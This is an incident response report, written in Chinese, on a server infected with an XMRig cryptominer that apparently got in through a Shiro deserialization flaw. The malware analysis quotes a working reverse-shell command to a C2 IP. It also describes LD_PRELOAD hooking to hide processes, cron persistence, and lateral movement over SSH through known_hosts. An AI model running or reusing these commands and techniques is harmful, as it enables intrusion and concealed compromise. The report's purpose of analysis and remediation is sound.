01 事件背景介绍

某单位服务器存在CUP资源异常占用情况，现需对该情况进行排查。

02 定位挖矿主机

由于明确存在CPU资源异常占用的主机，所以先行对该台主机进行上机排查。

03 挖矿主机分析

查看系统账号情况，未发现系统可疑、后门账号。



查看系统安全日志，在系统日志secure中发现近日SSH登录痕迹，确认后不存在异常登录情况。



查看系统计划任务，在服务器计划任务中发现可疑任务。

04 病毒样本分析

根据计划任务，下载病毒样本，分析恶意代码可知存在以下攻击行为：

1、下载采用XMRig编译的挖矿木马hxxp://w.apacheorg.top:1234/.libs。

2、通过Linux动态链接库LD_PRELOAD劫持加载恶意.so文件libs.so，libs.so hook readdir函数对指定进程进行隐藏。

3、通过创建crontab定时任务、写入启动项方式维持控制。

4、被控制机器反弹shell连接到控制端198.46.202.146:8899
nohup bash -i >& /dev/tcp/198.46.202.146/8899 0>&1 &

5、从/.ssh/known_hosts中获取已认证的远程主机ID，与对应的主机建立SSH连接并执行命令下载恶意脚本xms。

6、清理入侵痕迹。

根据样本分析结果，到相关路径下发现确实存在恶意so文件等，进一步确认该台服务器已被入侵，并植入挖矿病毒。

其主要被控制行为有：连接黑客控制的服务器建立shell、接受黑客远程控制、安装门罗币挖矿木马、劫持Linux库文件加载过程劫持libs.so文件，Hook Readdir函数对木马进程进行隐藏、创建定时任务、启动项进行持久化。

05 入侵路径梳理

通过上述分析，已明确该主机被植入挖矿病毒，现对主机进行入侵痕迹排查，排查发现：

该台主机的443端⼝对公网开放，并且使用了shiro认证框架。猜测攻击者有可能使⽤了shiro反序列化漏洞获取服务器权限，于是进行漏洞验证。

发现存在可利用的shiro漏洞组件，利用该漏洞能root权限远程命令执行。

由于应用服务器未开启Web日志记录，仅能大概推断攻击者直接利⽤shiro反序列化漏洞植⼊了病毒样本。

推断攻击者攻击路径为：

1、利用shiro服务漏洞攻击，植入恶意Payload执行恶意命令进而入侵系统。

2、执行恶意命令下载挖矿木马，僵尸网络木马，爆破攻击程序。

3、劫持Linux库文件加载libs.so，Hook Readdir函数隐藏木马进程。

4、创建定时任务、系统启动项。

5、反弹shell连接控制端。

6、挖矿程序不间断的工作，导致系统CPU负载过大，大量消耗主机CPU资源，严重影响主机正常服务运行，导致主机有系统崩溃风险。

06 安全加固建议

1、升级shiro组件至最新版本，且修改默认密钥。

2、及时清除病毒程序创建的定时任务、系统启动项。

3、及时修改系统账号与密码。

4、在边界防火墙对矿池IP进行封禁，禁止内网服务器访问矿池IP。